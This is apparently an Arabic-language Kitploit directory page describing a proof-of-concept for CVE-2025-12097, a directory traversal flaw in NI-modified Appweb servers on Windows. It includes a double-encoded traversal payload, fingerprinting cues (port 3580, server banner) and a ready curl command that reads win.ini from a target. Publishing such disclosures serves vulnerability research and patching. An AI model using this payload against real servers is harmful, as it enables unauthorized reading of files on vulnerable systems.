Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
PoC-CVE-2025-12097 — إثبات المفهوم لاستغلال CVE-2025-12097، ثغرة اجتياز الدليل في خادم Appweb NI-modified تسمح بقراءة ملفات عشوائية على أنظمة Windows. | Kitploit
أدوات/GitHubGitHub/matejsmycka/poc-cve-2025-12097
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراق
GitHubmatejsmycka/poc-cve-2025-12097

PoC-CVE-2025-12097

إثبات المفهوم لاستغلال CVE-2025-12097، ثغرة اجتياز الدليل في خادم Appweb NI-modified تسمح بقراءة ملفات عشوائية على أنظمة Windows.

عرض المستودع
1منذ 9 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-12097

الوصف

يحتوي تعديل NI لخادم Appweb على ثغرة اجتياز دليل تسمح للمهاجم بقراءة ملفات عشوائية على الخادم.

مسار URI /.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/windows/win.ini سيتم تحويله إلى:

root@kitploit:~
pathInfo cchar * "/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/windows/win.ini” 0x000000010076f808

وهو URI صالح ولا يقوم Appweb بحظر هذا الطلب. ثم يتم تمريره إلى معالج مخصص يعيد في هذه الحالة محتويات أي ملف مطلوب.

نظرًا لطبيعة البرنامج المتأثر، فإن الأجهزة المتأثرة هي حصريًا أنظمة Microsoft Windows.

أعلى نسخة ضعيفة تم رصدها: 12.0.0.

تحديد الأجهزة الضعيفة

يمكن تحديد الأجهزة المتأثرة من خلال الخصائص التالية:

ليست موجودة دائمًا، لكن في معظم الحالات تعمل الخدمة على المنفذ 3580، وقد تشمل المنافذ الأخرى 8080 و80.

استجابة الخادم إلى /

root@kitploit:~
HTTP/1.1 404 Not Found
Server: Mbedthis-Appweb/2.5.0
Date: Thu, 11 Dec 2025 18:23:26 GMT
Connection: keep-alive
Keep-Alive: timeout=60000, max=100
Content-Type: text/html
Content-length: 126

<HTML><HEAD><TITLE>Document Error: Not Found</TITLE></HEAD>
<BODY><H2>Access Error: 404 -- Not Found</H2>
</BODY></HTML>

إثبات المفهوم

لاستغلال هذه الثغرة، يمكنك استخدام الأمر التالي:

root@kitploit:~
curl http://<TARGET>:3580/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/windows/win.ini

سترى محتويات ملف win.ini إذا كان الهدف ضعيفًا.

تنزيل الأداة